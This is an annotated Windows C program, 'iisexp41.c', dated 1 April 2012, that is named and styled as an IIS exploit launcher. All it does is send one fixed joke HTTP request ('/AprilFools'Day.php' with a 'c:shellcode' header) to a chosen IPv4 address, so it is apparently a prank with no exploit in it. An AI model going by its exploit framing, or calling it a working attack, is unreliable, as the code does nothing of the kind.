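/*
 * iisexp41.c ver4.1 copy by @yuange1975 2012.4.1
 *
 * 假作真时真亦假。 ("When the false is taken for true, the true becomes false.")
 * http://weibo.com/yuange1975
 * http://twitter.com/yuange75
 * http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
 *
 * Reviewer note: despite the file name there is no exploit in this file.
 * The only bytes ever sent are the literal HTTP request in AprilFoolsDay
 * (the build_crash_package() call was commented out in the original), so
 * the target receives one GET for /AprilFools'Day.php and the connection
 * is closed without reading a reply. Dated 1 April 2012; read it as a prank.
 *
 * The original include list was lost in extraction (eleven bare "#include"
 * directives survived, plus a "_beginthread, _endthread" remark that hints
 * at <process.h>). The headers below are the ones the names used in this
 * file actually need; nothing here spawns a thread. winsock2.h must precede
 * windows.h. Windows/Winsock only.
 */
#include <winsock2.h>
#include <windows.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "Mswsock")

/*
 * The complete request sent by do_exp(). Kept byte-for-byte: note the bare
 * LF after "a=b" (no CR), which makes that header line malformed —
 * presumably part of the joke rather than an accident.
 */
const char *AprilFoolsDay = "GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";

/*
 * Parse @name as a dotted-quad IPv4 literal.
 *
 * Returns the address in network byte order, or 0 when @name is NULL or not
 * a literal. Despite the name no DNS lookup is done: a hostname is rejected,
 * not resolved. inet_addr() cannot distinguish "255.255.255.255" from
 * INADDR_NONE, so that address is rejected too; INADDR_ANY ("0.0.0.0") is
 * rejected deliberately because connecting to it is never what the caller
 * meant.
 */
static unsigned int maybe_lookup_host(const char *name)
{
    unsigned long ip;

    if (name == NULL)
        return 0;

    ip = inet_addr(name);
    if (ip == INADDR_NONE || ip == INADDR_ANY)
        return 0;

    return (unsigned int)ip;
}

/*
 * Connect to @hostname:@port over TCP, send AprilFoolsDay once, and close
 * the socket. Nothing is read back.
 *
 * @hostname must be an IPv4 literal (see maybe_lookup_host); @port is a TCP
 * port in host byte order, 1..65535. WSAStartup() must already have
 * succeeded.
 *
 * Returns 0 when the whole request was handed to send(), -1 on any failure
 * (unparseable address, bad port, socket creation, connect or send error),
 * with a diagnostic on stderr.
 *
 * Fixes relative to the original: the result of maybe_lookup_host() was
 * never checked, so a non-literal target silently connected to 0.0.0.0;
 * WSAGetLastError() was read after closesocket(), which may overwrite it;
 * sockaddr_in was not zeroed; send()'s return value was printed but never
 * checked for SOCKET_ERROR or a short write; and "%d" was used for an
 * unsigned port.
 */
int do_exp(const char *hostname, unsigned int port)
{
    SOCKET sock = INVALID_SOCKET;
    struct sockaddr_in sin;
    unsigned int addr;
    const char *payload = AprilFoolsDay;
    size_t total = strlen(AprilFoolsDay);
    size_t sent = 0;
    int err;

    /* Reject non-literal targets up front instead of connecting to 0.0.0.0. */
    addr = maybe_lookup_host(hostname);
    if (addr == 0) {
        fprintf(stderr, "[-] '%s' is not an IPv4 address (no DNS lookup is performed)\n",
                hostname != NULL ? hostname : "(null)");
        return -1;
    }
    /* htons() would silently truncate anything wider than 16 bits. */
    if (port == 0 || port > 65535) {
        fprintf(stderr, "[-] invalid port %u\n", port);
        return -1;
    }

    /* Plain blocking socket: the overlapped flag was deliberately left off. */
    sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET) {
        fprintf(stderr, "WSASocket function failed with error = %d\n", WSAGetLastError());
        return -1;
    }

    memset(&sin, 0, sizeof sin);            /* sin_zero must be zero */
    sin.sin_family = AF_INET;
    sin.sin_port = htons((unsigned short)port);
    memcpy(&sin.sin_addr, &addr, sizeof sin.sin_addr);

    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) == SOCKET_ERROR) {
        /*
         * Capture the error before closesocket() can clobber it. The socket
         * is blocking, so connect() never returns WSAEWOULDBLOCK here; the
         * original's tolerance of that code had no case to apply to.
         */
        err = WSAGetLastError();
        closesocket(sock);
        fprintf(stderr, "connect function failed with error: %d\n", err);
        return -1;
    }
    printf("[*] connected to %s:%u\n", hostname, port);

    /* send() may accept fewer bytes than requested; loop until all are out. */
    while (sent < total) {
        int n = send(sock, payload + sent, (int)(total - sent), 0);
        if (n == SOCKET_ERROR) {
            err = WSAGetLastError();
            closesocket(sock);
            fprintf(stderr, "send function failed with error: %d\n", err);
            return -1;
        }
        sent += (size_t)n;
    }
    printf("[*] send %d bytes\n", (int)sent);

    closesocket(sock);
    return 0;
}

/*
 * Entry point: iisexp41 <ipv4-address> [port]
 *
 * The port defaults to 80, the only value the original accepted; an
 * optional second argument overrides it and is validated with strtoul().
 * Exit status is 0 on success and 1 on a usage error, Winsock
 * initialisation failure, or do_exp() failure (the original always
 * returned 0 from the usage path and -1 from WSAStartup failure).
 */
int main(int argc, const char **argv)
{
    WSADATA wsaData;
    unsigned int port = 80;
    int rc;

    /* Check argc before touching argv[1]; argv[argc] is NULL by the standard
     * but a bare-argv launcher need not honour that. */
    if (argc < 2 || argv[1] == NULL) {
        fprintf(stderr, "usage: %s <ipv4-address> [port]\n",
                (argc > 0 && argv[0] != NULL) ? argv[0] : "iisexp41");
        return 1;
    }

    if (argc > 2 && argv[2] != NULL) {
        char *end = NULL;
        unsigned long v;

        errno = 0;
        v = strtoul(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || errno == ERANGE || v == 0 || v > 65535) {
            fprintf(stderr, "invalid port: %s\n", argv[2]);
            return 1;
        }
        port = (unsigned int)v;
    }

    /* Initialize Winsock */
    rc = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (rc != 0) {
        fprintf(stderr, "WSAStartup failed: %d\n", rc);
        return 1;
    }

    rc = do_exp(argv[1], port);

    /* clean - win socket */
    WSACleanup();
    return rc == 0 ? 0 : 1;
}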